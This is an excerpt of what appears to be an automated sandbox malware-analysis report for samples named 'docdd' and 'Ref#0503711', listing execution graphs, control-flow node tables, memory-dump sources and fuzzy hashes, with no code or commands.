                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1727443931.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_bd0000_docdd.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d740a695efd64e92d313171466a569b12ac4015a0cc0b22ba7165ca4aedc2652
                                                                • Instruction ID: 1c7e292ceac40a6f010957b3aac9904f78ab1ed3bc8aa32fbe046504aa777ea6
                                                                • Opcode Fuzzy Hash: d740a695efd64e92d313171466a569b12ac4015a0cc0b22ba7165ca4aedc2652
                                                                • Instruction Fuzzy Hash: C2A002B07401018FCE08DB55DF5A415FB21FF85301305C294D00E490618B219881CA40

                                                                Execution Graph

                                                                Execution Coverage:14%
                                                                Dynamic/Decrypted Code Coverage:100%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:29
                                                                Total number of Limit Nodes:6
                                                                execution_graph 29493 12c0848 29495 12c084e 29493->29495 29494 12c091b 29495->29494 29499 12c138c 29495->29499 29504 12c1383 29495->29504 29509 12c1488 29495->29509 29501 12c138e 29499->29501 29500 12c1480 29500->29495 29501->29500 29503 12c1488 GlobalMemoryStatusEx 29501->29503 29515 12c7ea8 29501->29515 29503->29501 29506 12c138e 29504->29506 29505 12c1480 29505->29495 29506->29505 29507 12c1488 GlobalMemoryStatusEx 29506->29507 29508 12c7ea8 GlobalMemoryStatusEx 29506->29508 29507->29506 29508->29506 29511 12c1396 29509->29511 29512 12c148f 29509->29512 29510 12c1480 29510->29495 29511->29510 29513 12c1488 GlobalMemoryStatusEx 29511->29513 29514 12c7ea8 GlobalMemoryStatusEx 29511->29514 29512->29495 29513->29511 29514->29511 29516 12c7eb2 29515->29516 29517 12c7ecc 29516->29517 29520 6b5faa9 29516->29520 29524 6b5fab8 29516->29524 29517->29501 29522 6b5facd 29520->29522 29521 6b5fce2 29521->29517 29522->29521 29523 6b5fcf7 GlobalMemoryStatusEx 29522->29523 29523->29522 29525 6b5facd 29524->29525 29526 6b5fce2 29525->29526 29527 6b5fcf7 GlobalMemoryStatusEx 29525->29527 29526->29517 29527->29525

                                                                Executed Functions

                                                                Function 06B53100 Relevance: 8.0, Strings: 6, Instructions: 545COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 129 6b53100-6b53121 130 6b53123-6b53126 129->130 131 6b5314c-6b5314f 130->131 132 6b53128-6b53147 130->132 133 6b53155-6b53174 131->133 134 6b538f0-6b538f2 131->134 132->131 142 6b53176-6b53179 133->142 143 6b5318d-6b53197 133->143 136 6b538f4 134->136 137 6b538f9-6b538fc 134->137 136->137 137->130 138 6b53902-6b5390b 137->138 142->143 144 6b5317b-6b5318b 142->144 147 6b5319d-6b531ac 143->147 144->147 255 6b531ae call 6b53920 147->255 256 6b531ae call 6b53918 147->256 148 6b531b3-6b531b8 149 6b531c5-6b534a2 148->149 150 6b531ba-6b531c0 148->150 171 6b538e2-6b538ef 149->171 172 6b534a8-6b53557 149->172 150->138 181 6b53580 172->181 182 6b53559-6b5357e 172->182 184 6b53589-6b5359c 181->184 182->184 186 6b535a2-6b535c4 184->186 187 6b538c9-6b538d5 184->187 186->187 190 6b535ca-6b535d4 186->190 187->172 188 6b538db 187->188 188->171 190->187 191 6b535da-6b535e5 190->191 191->187 192 6b535eb-6b536c1 191->192 204 6b536c3-6b536c5 192->204 205 6b536cf-6b536ff 192->205 204->205 209 6b53701-6b53703 205->209 210 6b5370d-6b53719 205->210 209->210 211 6b53779-6b5377d 210->211 212 6b5371b-6b5371f 210->212 213 6b53783-6b537bf 211->213 214 6b538ba-6b538c3 211->214 212->211 215 6b53721-6b5374b 212->215 226 6b537c1-6b537c3 213->226 227 6b537cd-6b537db 213->227 214->187 214->192 222 6b5374d-6b5374f 215->222 223 6b53759-6b53776 215->223 222->223 223->211 226->227 229 6b537f2-6b537fd 227->229 230 6b537dd-6b537e8 227->230 234 6b53815-6b53826 229->234 235 6b537ff-6b53805 229->235 230->229 233 6b537ea 230->233 233->229 239 6b5383e-6b5384a 234->239 240 6b53828-6b5382e 234->240 236 6b53807 235->236 237 6b53809-6b5380b 235->237 236->234 237->234 244 6b53862-6b538b3 239->244 245 6b5384c-6b53852 239->245 241 6b53830 240->241 242 6b53832-6b53834 240->242 241->239 242->239 244->214 246 6b53854 245->246 247 6b53856-6b53858 245->247 246->244 247->244 255->148 256->148
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                • API String ID: 0-2392861976
                                                                • Opcode ID: 5aaa80cc58c3cf99ce4097455fe9e29071db59c7ffc5c4002f5014b0ad6295c4
                                                                • Instruction ID: cc72870bcaebd062ddb51373d5e4139d2889736e05d9e3da9a9984b38f1f248e
                                                                • Opcode Fuzzy Hash: 5aaa80cc58c3cf99ce4097455fe9e29071db59c7ffc5c4002f5014b0ad6295c4
                                                                • Instruction Fuzzy Hash: E3322E31E1071ACFCB14EF75C854A9DB7B2FF89300F1186A9D449AB264EB70A985CB91
                                                                Function 06B57DF0 Relevance: 3.0, Strings: 2, Instructions: 477COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 799 6b57df0-6b57e0e 800 6b57e10-6b57e13 799->800 801 6b57e15-6b57e2f 800->801 802 6b57e34-6b57e37 800->802 801->802 803 6b57e44-6b57e47 802->803 804 6b57e39-6b57e43 802->804 806 6b57e5e-6b57e61 803->806 807 6b57e49-6b57e57 803->807 808 6b57e84-6b57e86 806->808 809 6b57e63-6b57e7f 806->809 814 6b57e96-6b57eac 807->814 815 6b57e59 807->815 810 6b57e8d-6b57e90 808->810 811 6b57e88 808->811 809->808 810->800 810->814 811->810 819 6b580c7-6b580d1 814->819 820 6b57eb2-6b57ebb 814->820 815->806 821 6b57ec1-6b57ede 820->821 822 6b580d2-6b580dc 820->822 829 6b580b4-6b580c1 821->829 830 6b57ee4-6b57f0c 821->830 825 6b5812d-6b5813e 822->825 826 6b580de-6b58107 822->826 836 6b58140-6b58184 825->836 837 6b58123-6b58127 825->837 828 6b58109-6b5810c 826->828 831 6b58341-6b58344 828->831 832 6b58112-6b58121 828->832 829->819 829->820 830->829 854 6b57f12-6b57f1b 830->854 834 6b58367-6b5836a 831->834 835 6b58346-6b58362 831->835 832->836 832->837 840 6b58415-6b58417 834->840 841 6b58370-6b5837c 834->841 835->834 846 6b58315-6b5832b 836->846 847 6b5818a-6b5819b 836->847 837->825 843 6b5841e-6b58421 840->843 844 6b58419 840->844 850 6b58387-6b58389 841->850 843->828 848 6b58427-6b58430 843->848 844->843 846->831 864 6b581a1-6b581be 847->864 865 6b58300-6b5830f 847->865 851 6b583a1-6b583a5 850->851 852 6b5838b-6b58391 850->852 858 6b583a7-6b583b1 851->858 859 6b583b3 851->859 856 6b58395-6b58397 852->856 857 6b58393 852->857 854->822 861 6b57f21-6b57f3d 854->861 856->851 857->851 862 6b583b8-6b583ba 858->862 859->862 871 6b57f43-6b57f6d 861->871 872 6b580a2-6b580ae 861->872 866 6b583bc-6b583bf 862->866 867 6b583cb-6b58404 862->867 864->865 876 6b581c4-6b582ba call 6b56618 864->876 865->846 865->847 866->848 867->832 886 6b5840a-6b58414 867->886 883 6b57f73-6b57f9b 871->883 884 6b58098-6b5809d 871->884 872->829 872->854 933 6b582bc-6b582c6 876->933 934 6b582c8 876->934 883->884 892 6b57fa1-6b57fcf 883->892 884->872 892->884 898 6b57fd5-6b57fde 892->898 898->884 899 6b57fe4-6b58016 898->899 907 6b58021-6b5803d 899->907 908 6b58018-6b5801c 899->908 907->872 910 6b5803f-6b58096 call 6b56618 907->910 908->884 909 6b5801e 908->909 909->907 910->872 935 6b582cd-6b582cf 933->935 934->935 935->865 936 6b582d1-6b582d6 935->936 937 6b582e4 936->937 938 6b582d8-6b582e2 936->938 939 6b582e9-6b582eb 937->939 938->939 939->865 940 6b582ed-6b582f9 939->940 940->865
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $^q$$^q
                                                                • API String ID: 0-355816377
                                                                • Opcode ID: fbb9f04e56d7664e00672e19f8a9943c311d46b51b51e94ae9117ab73e96e0ac
                                                                • Instruction ID: 587603e6071b0c33e3eb8b211c8c274f6f94481c0dfad27b2b797c5944b1f8dc
                                                                • Opcode Fuzzy Hash: fbb9f04e56d7664e00672e19f8a9943c311d46b51b51e94ae9117ab73e96e0ac
                                                                • Instruction Fuzzy Hash: D802AD70B102259FDB54DB64D890BAEB7A2FF84300F1589A9D8069B394DB31EC86CB81
                                                                Function 06B52409 Relevance: 1.0, Instructions: 1009COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bb9a59f7cc7abc8fc44a2530a3fb681c9bb1d0872d39f192d4944887e1920516
                                                                • Instruction ID: 53d88948efed7794ee322a33dfd65efcae6db6456ba02cb7b7eba85f4d0dfea1
                                                                • Opcode Fuzzy Hash: bb9a59f7cc7abc8fc44a2530a3fb681c9bb1d0872d39f192d4944887e1920516
                                                                • Instruction Fuzzy Hash: D6926774E012048FDB64DB68C584BADB7F2FF48314F5694A9D849AB361DB35ED82CB80
                                                                Function 06B56668 Relevance: .8, Instructions: 819COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 56d9c6104f57652204c9e42f22e5a1d2e6d8765db5171971376c55826e8f7d1f
                                                                • Instruction ID: 08c108789a91da20a5a650c563cd53930dd3ff4598bb4320719f722edcf56ec5
                                                                • Opcode Fuzzy Hash: 56d9c6104f57652204c9e42f22e5a1d2e6d8765db5171971376c55826e8f7d1f
                                                                • Instruction Fuzzy Hash: DE62BE74B002048FDB54DB68D594BADB7F2EF88314F5585A9E806DB3A4EB35EC46CB80
                                                                Function 06B5C200 Relevance: .7, Instructions: 652COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 20df45dced1136c9a6ae906d79a01504b95f490ab917f4894edc0b3c8517d3dc
                                                                • Instruction ID: 82326fe8d6c96c4b7d8dedc1282ce4408d08042ba88af7293a0c6ae1e43c2d31
                                                                • Opcode Fuzzy Hash: 20df45dced1136c9a6ae906d79a01504b95f490ab917f4894edc0b3c8517d3dc
                                                                • Instruction Fuzzy Hash: 9732B174A002098FDF54EB68D890BAEBBB3EB88310F119569D906DB355DB35EC42CB91
                                                                Function 06B55640 Relevance: .6, Instructions: 590COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 668fa9db5283205d9913e037a1d7a03be0f3e6bc73089170d8794a9897bde7d2
                                                                • Instruction ID: 27930d2c4f8ad449820d732509b1a6ca757be60f610c0a680e72f49497452c40
                                                                • Opcode Fuzzy Hash: 668fa9db5283205d9913e037a1d7a03be0f3e6bc73089170d8794a9897bde7d2
                                                                • Instruction Fuzzy Hash: 501203B2F002059BDF74DB64C8847AEB7A2FF85311F2184A9D85A9B345DB34EC41CB91
                                                                Function 06B5B2AA Relevance: .6, Instructions: 560COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f3cf2ea118e5b47b1cb0d543318135db0ac69936e888b8806518c3c554a41e3c
                                                                • Instruction ID: 1a17cf2f32cdd20404856d8b47e05d3e3657de358b556579d0cc3ba70aa13beb
                                                                • Opcode Fuzzy Hash: f3cf2ea118e5b47b1cb0d543318135db0ac69936e888b8806518c3c554a41e3c
                                                                • Instruction Fuzzy Hash: 532291B0E102099FEF64DB68D5A07EDB7B2FB49310F219865E809EB391DA35DC81CB51
                                                                Function 06B5ADC4 Relevance: 10.4, Strings: 8, Instructions: 387COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 0 6b5adc4-6b5adc7 1 6b5adcc-6b5adcf 0->1 2 6b5add1-6b5adda 1->2 3 6b5ade9-6b5adec 1->3 4 6b5ade0-6b5ade4 2->4 5 6b5af7f-6b5af89 2->5 6 6b5adf6-6b5adf9 3->6 7 6b5adee-6b5adf3 3->7 4->3 14 6b5af38-6b5af3b 5->14 15 6b5af8b-6b5af8d 5->15 8 6b5ae13-6b5ae16 6->8 9 6b5adfb-6b5ae0e 6->9 7->6 11 6b5af65-6b5af6e 8->11 12 6b5ae1c-6b5ae1e 8->12 9->8 11->2 18 6b5af74-6b5af7e 11->18 16 6b5ae25-6b5ae28 12->16 17 6b5ae20 12->17 19 6b5af3c-6b5af3e 14->19 15->19 20 6b5af8f-6b5af90 15->20 21 6b5ae2e-6b5ae52 16->21 22 6b5ad68-6b5ad6b 16->22 17->16 25 6b5af40-6b5af5b 19->25 20->25 26 6b5af93-6b5afb6 20->26 43 6b5af62 21->43 44 6b5ae58-6b5ae67 21->44 23 6b5ad6d-6b5ad89 22->23 24 6b5ad8e-6b5ad91 22->24 23->24 27 6b5ada1-6b5ada4 24->27 28 6b5ad93-6b5ad9c 24->28 25->43 29 6b5afb8-6b5afbb 26->29 34 6b5adb5-6b5adb8 27->34 35 6b5ada6-6b5adaa 27->35 28->27 32 6b5afbd-6b5afd9 29->32 33 6b5afde-6b5afe1 29->33 32->33 38 6b5afe3-6b5afe7 33->38 39 6b5afee-6b5aff1 33->39 34->1 41 6b5adba-6b5adbd 34->41 35->18 40 6b5adb0 35->40 47 6b5b007-6b5b042 38->47 48 6b5afe9 38->48 49 6b5aff3-6b5affd 39->49 50 6b5affe-6b5b001 39->50 40->34 41->0 43->11 60 6b5ae7f-6b5aeba call 6b56618 44->60 61 6b5ae69-6b5ae6f 44->61 62 6b5b235-6b5b248 47->62 63 6b5b048-6b5b054 47->63 48->39 50->47 51 6b5b26a-6b5b26d 50->51 56 6b5b27c-6b5b27e 51->56 57 6b5b26f call 6b5b2aa 51->57 58 6b5b285-6b5b288 56->58 59 6b5b280 56->59 68 6b5b275-6b5b277 57->68 58->29 64 6b5b28e-6b5b298 58->64 59->58 82 6b5aed2-6b5aee9 60->82 83 6b5aebc-6b5aec2 60->83 65 6b5ae71 61->65 66 6b5ae73-6b5ae75 61->66 67 6b5b24a 62->67 71 6b5b074-6b5b0b8 63->71 72 6b5b056-6b5b06f 63->72 65->60 66->60 73 6b5b24b 67->73 68->56 89 6b5b0d4-6b5b113 71->89 90 6b5b0ba-6b5b0cc 71->90 72->67 73->73 94 6b5af01-6b5af12 82->94 95 6b5aeeb-6b5aef1 82->95 85 6b5aec4 83->85 86 6b5aec6-6b5aec8 83->86 85->82 86->82 96 6b5b119-6b5b1f4 call 6b56618 89->96 97 6b5b1fa-6b5b20f 89->97 90->89 103 6b5af14-6b5af1a 94->103 104 6b5af2a-6b5af33 94->104 98 6b5aef5-6b5aef7 95->98 99 6b5aef3 95->99 96->97 97->62 98->94 99->94 106 6b5af1c 103->106 107 6b5af1e-6b5af20 103->107 104->14 106->104 107->104
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                • API String ID: 0-3823777903
                                                                • Opcode ID: e1c0ea79a0d05bf6700c530cedac3d57084902a0894e5cea338cb3924fa5896e
                                                                • Instruction ID: 8d231125d6881d74c4ce806950f0cf8fc5f4925f9e51ef5d85c2a3e4a7559127
                                                                • Opcode Fuzzy Hash: e1c0ea79a0d05bf6700c530cedac3d57084902a0894e5cea338cb3924fa5896e
                                                                • Instruction Fuzzy Hash: 89E17D70E1020A8FCF55EF69D4906AEB7B2EF89300F218669D809EB354DB75D846CB91
                                                                Function 06B5B6C8 Relevance: 8.0, Strings: 6, Instructions: 471COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                • API String ID: 0-2392861976
                                                                • Opcode ID: d798a93b6bfce5a035bb08b68b9265c0bd1a080583522b49b3c8006e9644112f
                                                                • Instruction ID: bff149e9c5909683c0ed0ae50ba2bc6bce16fad64a42a3e657e309d4a65beee9
                                                                • Opcode Fuzzy Hash: d798a93b6bfce5a035bb08b68b9265c0bd1a080583522b49b3c8006e9644112f
                                                                • Instruction Fuzzy Hash: 1B029EB0E102098FDB64DF68D5A07ADB7B2FB85300F1199AAD806DB355DB31DD45CB81
                                                                Function 06B591C0 Relevance: 5.2, Strings: 4, Instructions: 231COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 427 6b591c0-6b591e5 428 6b591e7-6b591ea 427->428 429 6b59210-6b59213 428->429 430 6b591ec-6b5920b 428->430 431 6b59ad3-6b59ad5 429->431 432 6b59219-6b5922e 429->432 430->429 434 6b59ad7 431->434 435 6b59adc-6b59adf 431->435 439 6b59246-6b5925c 432->439 440 6b59230-6b59236 432->440 434->435 435->428 436 6b59ae5-6b59aef 435->436 444 6b59267-6b59269 439->444 441 6b59238 440->441 442 6b5923a-6b5923c 440->442 441->439 442->439 445 6b59281-6b592f2 444->445 446 6b5926b-6b59271 444->446 457 6b592f4-6b59317 445->457 458 6b5931e-6b5933a 445->458 447 6b59275-6b59277 446->447 448 6b59273 446->448 447->445 448->445 457->458 463 6b59366-6b59381 458->463 464 6b5933c-6b5935f 458->464 469 6b59383-6b593a5 463->469 470 6b593ac-6b593c7 463->470 464->463 469->470 475 6b593f2-6b593fc 470->475 476 6b593c9-6b593eb 470->476 477 6b5940c-6b59486 475->477 478 6b593fe-6b59407 475->478 476->475 484 6b594d3-6b594e8 477->484 485 6b59488-6b594a6 477->485 478->436 484->431 489 6b594c2-6b594d1 485->489 490 6b594a8-6b594b7 485->490 489->484 489->485 490->489
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $^q$$^q$$^q$$^q
                                                                • API String ID: 0-2125118731
                                                                • Opcode ID: 8728f224b8eb3535a14b65a7b518d9eef0b521867582946266368078e1c333d3
                                                                • Instruction ID: 862229ae812ac9d6420b3aa9b83ee28899a99f59a9548e7519deb0311c2f6e6a
                                                                • Opcode Fuzzy Hash: 8728f224b8eb3535a14b65a7b518d9eef0b521867582946266368078e1c333d3
                                                                • Instruction Fuzzy Hash: 9D916E70B0021A9FDB54EB65D9607AEB3F6EFC8204F1085A9C80DEB354EB31DD468B91
                                                                Function 06B5CFB8 Relevance: 4.6, Strings: 3, Instructions: 805COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 493 6b5cfb8-6b5cfd3 494 6b5cfd5-6b5cfd8 493->494 495 6b5d4a4-6b5d4b0 494->495 496 6b5cfde-6b5cfe1 494->496 497 6b5d4b6-6b5d7a3 495->497 498 6b5d26e-6b5d27d 495->498 499 6b5cff0-6b5cff3 496->499 500 6b5cfe3-6b5cfe5 496->500 705 6b5d7a9-6b5d7af 497->705 706 6b5d9ca-6b5d9d4 497->706 505 6b5d28c-6b5d298 498->505 506 6b5d27f-6b5d284 498->506 503 6b5cff5-6b5cff7 499->503 504 6b5d002-6b5d005 499->504 501 6b5d4a1 500->501 502 6b5cfeb 500->502 501->495 502->499 512 6b5cffd 503->512 513 6b5d35f-6b5d368 503->513 507 6b5d007-6b5d049 504->507 508 6b5d04e-6b5d051 504->508 509 6b5d9d5-6b5da0e 505->509 510 6b5d29e-6b5d2b0 505->510 506->505 507->508 516 6b5d053-6b5d095 508->516 517 6b5d09a-6b5d09d 508->517 528 6b5da10-6b5da13 509->528 529 6b5d2b5-6b5d2b8 510->529 512->504 514 6b5d377-6b5d383 513->514 515 6b5d36a-6b5d36f 513->515 519 6b5d494-6b5d499 514->519 520 6b5d389-6b5d39d 514->520 515->514 516->517 523 6b5d0e6-6b5d0e9 517->523 524 6b5d09f-6b5d0e1 517->524 519->501 520->501 550 6b5d3a3-6b5d3b5 520->550 526 6b5d132-6b5d135 523->526 527 6b5d0eb-6b5d12d 523->527 524->523 531 6b5d137-6b5d14d 526->531 532 6b5d152-6b5d155 526->532 527->526 536 6b5da15-6b5da41 528->536 537 6b5da46-6b5da49 528->537 538 6b5d301-6b5d304 529->538 539 6b5d2ba-6b5d2fc 529->539 531->532 545 6b5d157-6b5d15c 532->545 546 6b5d15f-6b5d162 532->546 536->537 547 6b5da58-6b5da5b 537->547 548 6b5da4b call 6b5db2d 537->548 543 6b5d306-6b5d348 538->543 544 6b5d34d-6b5d34f 538->544 539->538 543->544 558 6b5d356-6b5d359 544->558 559 6b5d351 544->559 545->546 552 6b5d164-6b5d173 546->552 553 6b5d1ab-6b5d1ae 546->553 554 6b5da5d-6b5da79 547->554 555 6b5da7e-6b5da80 547->555 566 6b5da51-6b5da53 548->566 580 6b5d3b7-6b5d3bd 550->580 581 6b5d3d9-6b5d3db 550->581 564 6b5d175-6b5d17a 552->564 565 6b5d182-6b5d18e 552->565 567 6b5d1f7-6b5d1fa 553->567 568 6b5d1b0-6b5d1f2 553->568 554->555 569 6b5da87-6b5da8a 555->569 570 6b5da82 555->570 558->494 558->513 559->558 564->565 565->509 574 6b5d194-6b5d1a6 565->574 566->547 583 6b5d243-6b5d246 567->583 584 6b5d1fc-6b5d23e 567->584 568->567 569->528 578 6b5da8c-6b5da9b 569->578 570->569 574->553 607 6b5db02-6b5db17 578->607 608 6b5da9d-6b5db00 call 6b56618 578->608 591 6b5d3c1-6b5d3cd 580->591 592 6b5d3bf 580->592 593 6b5d3e5-6b5d3f1 581->593 587 6b5d269-6b5d26c 583->587 588 6b5d248-6b5d264 583->588 584->583 587->498 587->529 588->587 600 6b5d3cf-6b5d3d7 591->600 592->600 618 6b5d3f3-6b5d3fd 593->618 619 6b5d3ff 593->619 600->593 608->607 627 6b5d404-6b5d406 618->627 619->627 627->501 630 6b5d40c-6b5d428 call 6b56618 627->630 644 6b5d437-6b5d443 630->644 645 6b5d42a-6b5d42f 630->645 644->519 648 6b5d445-6b5d492 644->648 645->644 648->501 707 6b5d7b1-6b5d7b6 705->707 708 6b5d7be-6b5d7c7 705->708 707->708 708->509 709 6b5d7cd-6b5d7e0 708->709 711 6b5d7e6-6b5d7ec 709->711 712 6b5d9ba-6b5d9c4 709->712 713 6b5d7ee-6b5d7f3 711->713 714 6b5d7fb-6b5d804 711->714 712->705 712->706 713->714 714->509 715 6b5d80a-6b5d82b 714->715 718 6b5d82d-6b5d832 715->718 719 6b5d83a-6b5d843 715->719 718->719 719->509 720 6b5d849-6b5d866 719->720 720->712 723 6b5d86c-6b5d872 720->723 723->509 724 6b5d878-6b5d891 723->724 726 6b5d897-6b5d8be 724->726 727 6b5d9ad-6b5d9b4 724->727 726->509 730 6b5d8c4-6b5d8ce 726->730 727->712 727->723 730->509 731 6b5d8d4-6b5d8eb 730->731 733 6b5d8ed-6b5d8f8 731->733 734 6b5d8fa-6b5d915 731->734 733->734 734->727 739 6b5d91b-6b5d934 call 6b56618 734->739 743 6b5d936-6b5d93b 739->743 744 6b5d943-6b5d94c 739->744 743->744 744->509 745 6b5d952-6b5d9a6 744->745 745->727
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $^q$$^q$$^q
                                                                • API String ID: 0-831282457
                                                                • Opcode ID: 77f35bca712b342e6437d22bce09cd753145ce683d11e20605389f573590cc4a
                                                                • Instruction ID: 65ad33f08165d085688eabca6b9ac7863adc352aabd4d5485fe2ee7b4829e69a
                                                                • Opcode Fuzzy Hash: 77f35bca712b342e6437d22bce09cd753145ce683d11e20605389f573590cc4a
                                                                • Instruction Fuzzy Hash: 20629230A0021A9FCB55EF69D980A9DB7F2FF84304F118A68D4099F359DB71ED4ACB94
                                                                Function 06B54C10 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 753 6b54c10-6b54c34 754 6b54c36-6b54c39 753->754 755 6b54c3b-6b54c55 754->755 756 6b54c5a-6b54c5d 754->756 755->756 757 6b54c63-6b54d5b 756->757 758 6b5533c-6b5533e 756->758 776 6b54d61-6b54dae call 6b554b8 757->776 777 6b54dde-6b54de5 757->777 760 6b55345-6b55348 758->760 761 6b55340 758->761 760->754 762 6b5534e-6b5535b 760->762 761->760 790 6b54db4-6b54dd0 776->790 778 6b54e69-6b54e72 777->778 779 6b54deb-6b54e5b 777->779 778->762 796 6b54e66 779->796 797 6b54e5d 779->797 793 6b54dd2 790->793 794 6b54ddb 790->794 793->794 794->777 796->778 797->796
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: fcq$XPcq$\Ocq
                                                                • API String ID: 0-3575482020
                                                                • Opcode ID: ea54d38ac5fb4bc91aa4466b432473343d705044fad240678e8147a6d2229a32
                                                                • Instruction ID: 9023c79c02e4c343a6b26cf139513602cf869d33608bbe4f659e0255696fe42b
                                                                • Opcode Fuzzy Hash: ea54d38ac5fb4bc91aa4466b432473343d705044fad240678e8147a6d2229a32
                                                                • Instruction Fuzzy Hash: CD61BD70F102199FEB54DFA5C8547AEBBF6FF88700F208429D50AAB394DB748C458B91
                                                                Function 06B591B3 Relevance: 2.7, Strings: 2, Instructions: 170COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
